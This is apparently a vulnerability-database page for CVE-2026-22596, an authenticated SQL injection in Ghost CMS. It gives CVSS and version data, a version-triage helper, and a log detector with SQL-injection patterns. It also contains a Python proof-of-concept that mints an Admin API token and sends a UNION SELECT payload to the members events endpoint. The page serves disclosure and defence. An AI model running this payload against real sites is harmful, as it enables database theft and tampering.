Security Vulnerability Report
CVE-2026-22596 CVSS 6.7 MEDIUM

Published: 2026-01-10 03:15:51
Last Modified: 2026-01-15 18:35:34

Description

Ghost is a Node.js content management system. In versions 5.90.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's /ghost/api/admin/members/events endpoint allows users with authentication credentials for the Admin API to execute arbitrary SQL. This issue has been patched in versions 5.130.6 and 6.11.0.

CVSS Details

CVSS Score (Secondary metric in the NVD record, the one shown in the page header)
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

NVD's own Primary metric for the same record rates the issue 7.2 HIGH (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H); the two vectors differ only in availability impact (A:L vs A:H), so treat this as HIGH when the NVD score is your triage input. In both vectors PR:H reflects that exploitation requires valid Admin API credentials, and C:H/I:H reflects arbitrary SQL against the Ghost database. The assigned weakness is CWE-89 (SQL Injection).

Configurations (Affected Products)

cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* - VULNERABLE
  Ghost 5.90.0 - 5.130.5 (versionStartIncluding 5.90.0, versionEndExcluding 5.130.6; fixed in 5.130.6)
cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* - VULNERABLE
  Ghost 6.0.0 - 6.10.3 (versionStartIncluding 6.0.0, versionEndExcluding 6.11.0; fixed in 6.11.0)
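The two NVD ranges above are half-open (start inclusive, end exclusive), which is easy to get wrong when checking fleets by hand. The following triage helper is an added example written for this page, not code from NVD or the Ghost project: it parses a Ghost version string and maps it onto those ranges. The sample response it feeds in is constructed; its shape (a top-level "site" object with a "version" field, as returned by Ghost's unauthenticated /ghost/api/admin/site/ endpoint) is an assumption, so pass in the version string however you actually obtain it.

```python
# Added example (not from the advisory or the Ghost project): decide whether a
# reported Ghost version falls inside the ranges NVD lists for CVE-2026-22596.
import json
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Half-open ranges [start, end) straight from the NVD configuration block.
AFFECTED_RANGES = (
    ((5, 90, 0), (5, 130, 6)),   # 5.90.0 <= v < 5.130.6 ; first fixed release 5.130.6
    ((6, 0, 0), (6, 11, 0)),     # 6.0.0  <= v < 6.11.0  ; first fixed release 6.11.0
)


def parse_version(version: str) -> Version:
    """Parse 'MAJOR.MINOR.PATCH' (an optional leading 'v' and any suffix are ignored)."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised Ghost version string: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable(version: str) -> bool:
    """True if the version is inside any affected range."""
    v = parse_version(version)
    return any(start <= v < end for start, end in AFFECTED_RANGES)


def fixed_version_for(version: str) -> Optional[str]:
    """First patched release on the same branch, or None when not affected."""
    v = parse_version(version)
    for start, end in AFFECTED_RANGES:
        if start <= v < end:
            return ".".join(str(x) for x in end)
    return None


def triage_site_response(body: str) -> dict:
    """Triage the JSON body of GET /ghost/api/admin/site/ (response shape assumed)."""
    version = json.loads(body)["site"]["version"]
    return {
        "version": version,
        "vulnerable": is_vulnerable(version),
        "upgrade_to": fixed_version_for(version),
    }


# Constructed sample response; the values are made up for the example.
SAMPLE_SITE_JSON = (
    '{"site": {"title": "Example Blog", "version": "5.128.2", '
    '"url": "https://blog.example"}}'
)

if __name__ == "__main__":
    print(triage_site_response(SAMPLE_SITE_JSON))
```

Note that 5.130.5 is flagged while 5.130.6 is not, and that the 4.x line and anything below 5.90.0 are outside the NVD ranges, so the helper reports them as not affected rather than guessing.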

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import time

import jwt  # PyJWT, used to mint the Admin API token
import requests

# CVE-2026-22596 PoC - Ghost CMS SQL Injection
# Target: /ghost/api/admin/members/events endpoint

TARGET_URL = "http://target-ghost-site.com"
# Ghost issues Admin API keys as "<id>:<secret>" (Ghost Admin -> Integrations);
# the secret is a hex string.
API_KEY_ID = "your_admin_api_key_id"
API_SECRET = "your_admin_api_secret_hex"


def admin_token(key_id, secret_hex):
    """Mint the short-lived JWT the Ghost Admin API expects in "Authorization: Ghost <token>".

    Per Ghost's Admin API documentation: HS256, header "kid" = key id,
    payload "aud" = "/admin/", signed with the hex-decoded secret, valid for at most 5 minutes.
    """
    now = int(time.time())
    payload = {"iat": now, "exp": now + 5 * 60, "aud": "/admin/"}
    return jwt.encode(payload, bytes.fromhex(secret_hex), algorithm="HS256", headers={"kid": key_id})


def exploit_sql_injection():
    """Ghost CMS SQL Injection PoC

    Demonstrates the vulnerability in /ghost/api/admin/members/events.
    Note: requires valid Admin API credentials (the advisory's precondition, PR:H).
    """
    # Construct the vulnerable endpoint
    endpoint = f"{TARGET_URL}/ghost/api/admin/members/events"

    # Malicious SQL payload - example: extract database version.
    # The advisory does not name the injected parameter; "filter" is this
    # page's illustrative choice. A real attacker would craft various payloads.
    sql_payload = "1' UNION SELECT NULL,version(),NULL,NULL,NULL--"

    headers = {
        "Authorization": f"Ghost {admin_token(API_KEY_ID, API_SECRET)}",
        "Accept-Version": "v5.0",  # Ghost's API versioning header
    }

    # Request carrying the malicious parameter
    params = {"filter": sql_payload, "limit": 10}

    try:
        response = requests.get(endpoint, headers=headers, params=params, timeout=30)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return

    if response.status_code == 200:
        print("[+] Request successful - potential SQL injection vulnerability")
        print(f"Response: {response.text[:500]}")
    elif response.status_code == 401:
        print("[-] Authentication failed - valid admin credentials required")
    else:
        print(f"[-] Request failed with status: {response.status_code}")


if __name__ == "__main__":
    print("Ghost CMS CVE-2026-22596 SQL Injection PoC")
    print("=" * 50)
    exploit_sql_injection()
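Because exploitation needs Admin API credentials, the defender's question is usually "did any authenticated client send SQL at this endpoint before we patched?" The script below is an added example for this page, not code from the advisory or from Ghost: it scans web-server access logs in the nginx/Apache "combined" format (an assumption about your log layout) for requests to the members events endpoint whose query parameters contain SQL keywords, comment markers or statement separators. Ghost's own filter syntax (NQL) legitimately uses quotes and colons, for example filter=type:'comment_event', so a single quote alone is not a signal; the detector keys on SQL tokens instead. The log lines are constructed for the example.

```python
# Added example (not from the advisory or the Ghost project): flag access-log
# entries that send SQL-looking query parameters to the vulnerable endpoint.
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# nginx/Apache "combined" log format (assumed): ip ident user [ts] "req" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TARGET_PREFIX = "/ghost/api/admin/members/events"

# SQL tokens that never appear in a legitimate NQL filter: keywords, time-based
# probes, comment markers and stacked-statement separators. Quotes are NOT
# included because NQL string literals use them.
SQL_PATTERN = re.compile(
    r"(?i)(\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|\bload_file\b|--|/\*|\*/|;)"
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(path: str) -> Dict[str, List[str]]:
    """Return {param: [values]} for query parameters that carry SQL tokens."""
    query = urlsplit(path).query
    hits: Dict[str, List[str]] = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        # parse_qs already decodes once; decoding again catches double-encoded payloads.
        bad = [v for v in values if SQL_PATTERN.search(unquote_plus(v))]
        if bad:
            hits[name] = bad
    return hits


def scan(lines: List[str]) -> List[dict]:
    """Return one finding per request to the members events endpoint with SQL-like parameters."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if not rec or not rec["path"].startswith(TARGET_PREFIX):
            continue
        hits = suspicious_params(rec["path"])
        if hits:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "status": rec["status"], "params": hits})
    return findings


# Constructed sample log lines (addresses from documentation ranges, values made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jan/2026:10:01:22 +0000] "GET /ghost/api/admin/members/events/'
    '?filter=type:\'comment_event\'&limit=10 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Jan/2026:10:02:40 +0000] "GET /ghost/api/admin/members/events/'
    '?filter=1\'%20UNION%20SELECT%20NULL,version(),NULL--&limit=10 HTTP/1.1" 200 5120 "-" "python-requests/2.31"',
    '198.51.100.7 - - [12/Jan/2026:10:03:01 +0000] "GET /ghost/api/admin/posts/'
    '?filter=status:published HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the second line is reported: the first is a normal NQL filter on the same endpoint, and the third targets a different endpoint. Because the Admin API is authenticated, correlate any hit with the integration key or staff user that issued the request before treating it as a false positive.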

References

https://github.com/TryGhost/Ghost/security/advisories/GHSA-gjrp-xgmh-x9qq - Vendor Advisory, Patch
https://github.com/TryGhost/Ghost/commit/cda236e455a7a30e828b6cba3c430e5796ded955 - Patch
https://github.com/TryGhost/Ghost/commit/f2165f968bcdaae0e35590b38fa280ab03239391 - Patch

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22596",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T03:15:50.703",
    "lastModified": "2026-01-15T18:35:34.103",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Ghost is a Node.js content management system. In versions 5.90.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's /ghost/api/admin/members/events endpoint allows users with authentication credentials for the Admin API to execute arbitrary SQL. This issue has been patched in versions 5.130.6 and 6.11.0."
      },
      {
        "lang": "es",
        "value": "Ghost es un sistema de gestión de contenido Node.js. En las versiones 5.90.0 a 5.130.5 y 6.0.0 a 6.10.3, una vulnerabilidad en el endpoint /ghost/api/admin/members/events de Ghost permite a los usuarios con credenciales de autenticación para la API de administración ejecutar SQL arbitrario. Este problema ha sido parcheado en las versiones 5.130.6 y 6.11.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "5.90.0",
                "versionEndExcluding": "5.130.6",
                "matchCriteriaId": "2D327CA9-FD73-4ABD-96CF-093B90712BA8"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "6.0.0",
                "versionEndExcluding": "6.11.0",
                "matchCriteriaId": "9EC484AC-A1F0-4C13-BFAB-9DA57116957D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/TryGhost/Ghost/commit/cda236e455a7a30e828b6cba3c430e5796ded955",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/TryGhost/Ghost/commit/f2165f968bcdaae0e35590b38fa280ab03239391",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-gjrp-xgmh-x9qq",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}